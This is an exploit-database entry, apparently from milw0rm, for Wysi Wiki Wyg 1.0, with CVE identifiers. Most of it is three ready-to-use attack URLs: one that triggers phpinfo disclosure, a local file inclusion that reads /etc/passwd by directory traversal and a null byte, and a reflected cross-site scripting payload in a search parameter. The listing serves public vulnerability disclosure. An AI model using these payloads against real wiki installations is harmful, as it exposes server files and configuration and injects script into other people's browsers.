[] NeoSense

Wysi Wiki Wyg 1.0 - Local File Inclusion / Cross-Site Scripting / PHPInfo

Author: StAkeR
type: webapps
platform: php
port: 
date_added: 2008-10-19 
date_updated:  
verified: 1 
codes: OSVDB-50586;CVE-2008-5323;OSVDB-50462;CVE-2008-5322;OSVDB-47022;CVE-2008-3205 
tags: 
aliases:  
screenshot_url:  
application_url: 

/*

   Wysi Wiki Wyg 1.0 (LFI,XSS,PHPInfo) Remote Vulnerabilities
   ----------------------------------------------------------
   By StAkeR[at]hotmail[dot]it
   http://www.easy-script.com/scripts-dl/wysiwikiwyg10.zip
   ----------------------------------------------------------

  1- PHPInfo Disclosure
  -  index.php?categup=isset

  2- Local File Inclusion (LFI) (MQ Off)
  -  index.php?c=../../../&a=etc/passwd%00

  3- Cross Site Scripting (XSS)
  -  index.php?c=wikiwizi&a=recherche&s=<script>[Javascript]</script>



*/

# milw0rm.com [2008-10-20]